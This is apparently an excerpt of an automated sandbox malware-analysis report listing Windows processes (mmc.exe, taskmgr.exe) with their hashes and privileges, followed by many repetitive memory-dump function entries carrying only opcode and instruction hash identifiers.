Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:18:40
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	11:18:46
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 03C90F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1538832218.0000000003C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3c90000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: 8db4134408ffa56065f8b0d22021f85a7f4ca5c03fb4b44f6bd28eb2aa432f07
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Function 03C90F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1538832218.0000000003C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3c90000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: 8db4134408ffa56065f8b0d22021f85a7f4ca5c03fb4b44f6bd28eb2aa432f07
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Function 03C90FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1538832218.0000000003C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3c90000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction ID: 8db4134408ffa56065f8b0d22021f85a7f4ca5c03fb4b44f6bd28eb2aa432f07
Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 2664, Parent PID: 3624COMMON

Executed Functions

Function 04380FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1545353884.0000000004380000.00000010.00000800.00020000.00000000.sdmp, Offset: 04380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4380000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 57bdd10337c22a88821ae34ae8063a215313f58d268daa00c7312030ef731b31
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04380F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1545353884.0000000004380000.00000010.00000800.00020000.00000000.sdmp, Offset: 04380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4380000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 57bdd10337c22a88821ae34ae8063a215313f58d268daa00c7312030ef731b31
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04380F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1545353884.0000000004380000.00000010.00000800.00020000.00000000.sdmp, Offset: 04380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4380000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 57bdd10337c22a88821ae34ae8063a215313f58d268daa00c7312030ef731b31
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04330FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000003.520086116.0000000004330000.00000010.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_4330000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 2b103e21609f187ce141e3d1e60343ca6d527fc1fcf430a32773421c9b1782a6
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 2124, Parent PID: 3624COMMON

Executed Functions

Function 04290FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1544706808.0000000004290000.00000010.00000800.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4290000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: dad4569c4d77b644937939204cb85280998a23e5360189e9e714e71051d45ec2
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04290FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1544706808.0000000004290000.00000010.00000800.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4290000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: dad4569c4d77b644937939204cb85280998a23e5360189e9e714e71051d45ec2
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04290F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1544706808.0000000004290000.00000010.00000800.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4290000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: dad4569c4d77b644937939204cb85280998a23e5360189e9e714e71051d45ec2
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04290F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1544706808.0000000004290000.00000010.00000800.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4290000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: dad4569c4d77b644937939204cb85280998a23e5360189e9e714e71051d45ec2
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3068, Parent PID: 3624COMMON

Executed Functions

Function 03A80FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000003.560419658.0000000003A80000.00000010.00000800.00020000.00000000.sdmp, Offset: 03A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_3a80000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 31c8afe13dc13bd56373c28314ee3cc887aa8133508c280c6ccf308eb55141ed
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 03AC0FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1536998611.0000000003AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 03AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3ac0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 91d24b5db02974d06ca5a888b6b7504985831585801d429a9955ccb883733367
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 03AC0F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1536998611.0000000003AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 03AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3ac0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 91d24b5db02974d06ca5a888b6b7504985831585801d429a9955ccb883733367
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 03AC0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1536998611.0000000003AC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 03AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3ac0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 91d24b5db02974d06ca5a888b6b7504985831585801d429a9955ccb883733367
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 2996, Parent PID: 3624COMMON

Executed Functions

Function 03C70F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1537598326.0000000003C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3c70000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 01585f5d303b876af7e78f71be005d6b8ecc6e11b8796355df8db61974755866
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03C70F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1537598326.0000000003C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3c70000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 01585f5d303b876af7e78f71be005d6b8ecc6e11b8796355df8db61974755866
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03C00F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000003.587744313.0000000003C00000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_3c00000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: dcd2888b82481f8609320af9670666e93decd8f9359613cbacd7775d80ac35bf
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03C00F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000003.587744313.0000000003C00000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_3c00000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: dcd2888b82481f8609320af9670666e93decd8f9359613cbacd7775d80ac35bf
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03C00FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000003.587744313.0000000003C00000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_3c00000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: dcd2888b82481f8609320af9670666e93decd8f9359613cbacd7775d80ac35bf
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3448, Parent PID: 3624COMMON

Executed Functions

Function 042C0FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1545461101.00000000042C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 042C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_42c0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 838add76f80c8efbb1fd6031b1f41993af6d2453d89d0908bd568b454af61d5e
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 042C0F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1545461101.00000000042C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 042C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_42c0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 838add76f80c8efbb1fd6031b1f41993af6d2453d89d0908bd568b454af61d5e
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 042C0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1545461101.00000000042C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 042C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_42c0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: 838add76f80c8efbb1fd6031b1f41993af6d2453d89d0908bd568b454af61d5e
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 04200FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.615696029.0000000004200000.00000010.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_4200000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 5a202ac773b1f0b7c8383845b185439be3243089fb9c9c3d81f430d8e1083984
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3508, Parent PID: 3624COMMON

Executed Functions

Function 04110F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1543962596.0000000004110000.00000010.00000800.00020000.00000000.sdmp, Offset: 04110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4110000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 1a978b169ae570b14c1ffdfe7d9ba0764e6bf89767127cdc126341e4a83a5e43
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04110F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1543962596.0000000004110000.00000010.00000800.00020000.00000000.sdmp, Offset: 04110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4110000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 1a978b169ae570b14c1ffdfe7d9ba0764e6bf89767127cdc126341e4a83a5e43
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04110FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1543962596.0000000004110000.00000010.00000800.00020000.00000000.sdmp, Offset: 04110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4110000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 1a978b169ae570b14c1ffdfe7d9ba0764e6bf89767127cdc126341e4a83a5e43
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 04110FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1543962596.0000000004110000.00000010.00000800.00020000.00000000.sdmp, Offset: 04110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4110000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 1a978b169ae570b14c1ffdfe7d9ba0764e6bf89767127cdc126341e4a83a5e43
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 1996, Parent PID: 3624COMMON

Executed Functions

Function 02A90FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1536452812.0000000002A90000.00000010.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2a90000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: dac4ff3663d5e048f5c526d7c6ffc2a9a97d6815729a7febe8e505b5af94dbeb
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 02A90F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1536452812.0000000002A90000.00000010.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2a90000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: dac4ff3663d5e048f5c526d7c6ffc2a9a97d6815729a7febe8e505b5af94dbeb
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 02A90F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1536452812.0000000002A90000.00000010.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2a90000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction ID: dac4ff3663d5e048f5c526d7c6ffc2a9a97d6815729a7febe8e505b5af94dbeb
Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
Instruction Fuzzy Hash:

Function 029D0FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000003.645089503.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_29d0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 3588, Parent PID: 3624COMMON

Executed Functions

Function 03BF0FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000003.672721708.0000000003BF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_3_3bf0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: da70fdf5bb6d7d0b300b17ecaab80f7d335ea020c797df5d6a9d4e867c665350
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 03BF0F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000003.672721708.0000000003BF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_3_3bf0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: da70fdf5bb6d7d0b300b17ecaab80f7d335ea020c797df5d6a9d4e867c665350
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 03BF0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000003.672721708.0000000003BF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_3_3bf0000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: da70fdf5bb6d7d0b300b17ecaab80f7d335ea020c797df5d6a9d4e867c665350
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 03D40F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1538641110.0000000003D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 03D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_3d40000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: f7ad899bd363910bc48d9e2339956d3ee6ac30feafc2324ec31ee59d0fab3d4c
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03D40F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1538641110.0000000003D40000.00000010.00000800.00020000.00000000.sdmp, Offset: 03D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_3d40000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: f7ad899bd363910bc48d9e2339956d3ee6ac30feafc2324ec31ee59d0fab3d4c
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Analysis Process: mmc.exePID: 2316, Parent PID: 3624COMMON

Executed Functions

Function 03C70F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1538838687.0000000003C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_3c70000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 01585f5d303b876af7e78f71be005d6b8ecc6e11b8796355df8db61974755866
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03C70F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1538838687.0000000003C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_3c70000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 01585f5d303b876af7e78f71be005d6b8ecc6e11b8796355df8db61974755866
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03C70FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1538838687.0000000003C70000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_3c70000_mmc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction ID: 01585f5d303b876af7e78f71be005d6b8ecc6e11b8796355df8db61974755866
Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
Instruction Fuzzy Hash:

Function 03C70FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

